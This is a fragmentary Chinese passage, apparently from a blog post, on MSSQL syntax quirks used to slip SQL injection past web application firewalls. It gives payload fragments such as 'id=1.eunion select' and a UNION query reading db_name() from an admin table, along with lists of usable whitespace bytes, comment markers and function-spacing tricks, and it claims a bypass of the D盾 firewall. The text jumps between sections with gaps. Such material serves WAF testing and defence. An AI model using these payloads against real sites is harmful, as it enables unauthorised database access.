在MSSQL中,比如可以这样:
浮点数形式:id=1.1union select
科学计数法形式:id=1e0union select
但其实还可以这样子:id=1.eunion select
通过...1.e这样的形式,我曾用它绕过了D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下MSsql特性。...,1B,1C,1D,1E,1F,20
(2)注释符号
Mssql也可以使用注释符号 /**/
(3)浮点数
select * from admin where id=1.1union select 1,...select~1,'2',db_name() from admin
位置四:查询参数和from之间的位置
(1)空白字符
Mssql可以利用的空白字符有:01,02,03,04,05,06,07,08,09,0A...())
类型二:字符串转换函数
Ascii(‘a’)
Char(‘97’) 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypass
类型三:其他方式
利用存储过程
mssql的存储过程定义为